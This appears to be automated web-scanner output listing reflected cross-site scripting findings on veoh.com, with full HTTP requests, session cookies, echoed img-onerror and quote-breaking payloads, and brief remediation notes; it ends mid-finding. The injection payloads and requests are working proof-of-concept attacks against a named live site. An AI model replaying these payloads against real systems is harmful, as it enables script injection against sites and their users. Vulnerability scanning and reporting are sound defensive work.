GET /browse/videos/category/action_adventure5c238<img%20src%3da%20onerror%3dalert(1)>411e688a8fb/watch/v207484775fTsGMdN HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:48 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=56 Content-Length: 75674
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure5c238<img src=a onerror=alert(1)>411e688a8fb"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47a62'%3b78d21d340d1 was submitted in the REST URL parameter 6. This input was echoed as 47a62';78d21d340d1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v207484775fTsGMdN47a62'%3b78d21d340d1 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:58 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=80 Content-Length: 94049
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 89285<img%20src%3da%20onerror%3dalert(1)>bd2cbbace72 was submitted in the REST URL parameter 4. This input was echoed as 89285<img src=a onerror=alert(1)>bd2cbbace72 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure89285<img%20src%3da%20onerror%3dalert(1)>bd2cbbace72/watch/v207490874eKBjfZC HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:34 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=99 Content-Length: 75674
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure89285<img src=a onerror=alert(1)>bd2cbbace72"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43948"><img%20src%3da%20onerror%3dalert(1)>46bf4b641b6 was submitted in the REST URL parameter 4. This input was echoed as 43948"><img src=a onerror=alert(1)>46bf4b641b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure43948"><img%20src%3da%20onerror%3dalert(1)>46bf4b641b6/watch/v207490874eKBjfZC HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:37:11 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=69 Content-Length: 75718
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure43948"><img src=a onerror=alert(1)>46bf4b641b6/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1503'%3b3c33fe8edd6 was submitted in the REST URL parameter 6. This input was echoed as a1503';3c33fe8edd6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v207490874eKBjfZCa1503'%3b3c33fe8edd6 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:45 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=97 Content-Length: 94049
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb7a9"><img%20src%3da%20onerror%3dalert(1)>a20cb2010f8 was submitted in the REST URL parameter 4. This input was echoed as fb7a9"><img src=a onerror=alert(1)>a20cb2010f8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventurefb7a9"><img%20src%3da%20onerror%3dalert(1)>a20cb2010f8/watch/v20749145FCR2QekA HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:36:05 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=95 Content-Length: 75718
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventurefb7a9"><img src=a onerror=alert(1)>a20cb2010f8/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 267b0<img%20src%3da%20onerror%3dalert(1)>f093e2717f1 was submitted in the REST URL parameter 4. This input was echoed as 267b0<img src=a onerror=alert(1)>f093e2717f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure267b0<img%20src%3da%20onerror%3dalert(1)>f093e2717f1/watch/v20749145FCR2QekA HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:37:39 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=47 Content-Length: 75674
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure267b0<img src=a onerror=alert(1)>f093e2717f1"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9339'%3bd4a836c8b6c was submitted in the REST URL parameter 6. This input was echoed as a9339';d4a836c8b6c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v20749145FCR2QekAa9339'%3bd4a836c8b6c HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:16 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=14 Content-Length: 94049
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8887d"><img%20src%3da%20onerror%3dalert(1)>d7d3c7b55c9 was submitted in the REST URL parameter 4. This input was echoed as 8887d"><img src=a onerror=alert(1)>d7d3c7b55c9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure8887d"><img%20src%3da%20onerror%3dalert(1)>d7d3c7b55c9/watch/v20753891TQ237Z7N HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:37:26 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=4 Content-Length: 76350
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure8887d"><img src=a onerror=alert(1)>d7d3c7b55c9/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e2bc5<img%20src%3da%20onerror%3dalert(1)>20ab6849576 was submitted in the REST URL parameter 4. This input was echoed as e2bc5<img src=a onerror=alert(1)>20ab6849576 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventuree2bc5<img%20src%3da%20onerror%3dalert(1)>20ab6849576/watch/v20753891TQ237Z7N HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:35 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=88 Content-Length: 76304
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventuree2bc5<img src=a onerror=alert(1)>20ab6849576"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 217c0'%3b0ff76e45310 was submitted in the REST URL parameter 6. This input was echoed as 217c0';0ff76e45310 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v20753891TQ237Z7N217c0'%3b0ff76e45310 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:46 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=90 Content-Length: 94049
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d72a7"><img%20src%3da%20onerror%3dalert(1)>bce4688ba7f was submitted in the REST URL parameter 4. This input was echoed as d72a7"><img src=a onerror=alert(1)>bce4688ba7f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventured72a7"><img%20src%3da%20onerror%3dalert(1)>bce4688ba7f/watch/v2075425966g5b8E8 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:36:42 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=78 Content-Length: 76749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventured72a7"><img src=a onerror=alert(1)>bce4688ba7f/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e341d<img%20src%3da%20onerror%3dalert(1)>553e22281c1 was submitted in the REST URL parameter 4. This input was echoed as e341d<img src=a onerror=alert(1)>553e22281c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventuree341d<img%20src%3da%20onerror%3dalert(1)>553e22281c1/watch/v2075425966g5b8E8 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:37:36 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=93 Content-Length: 76705
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventuree341d<img src=a onerror=alert(1)>553e22281c1"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 134b4'%3b0705df69313 was submitted in the REST URL parameter 6. This input was echoed as 134b4';0705df69313 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
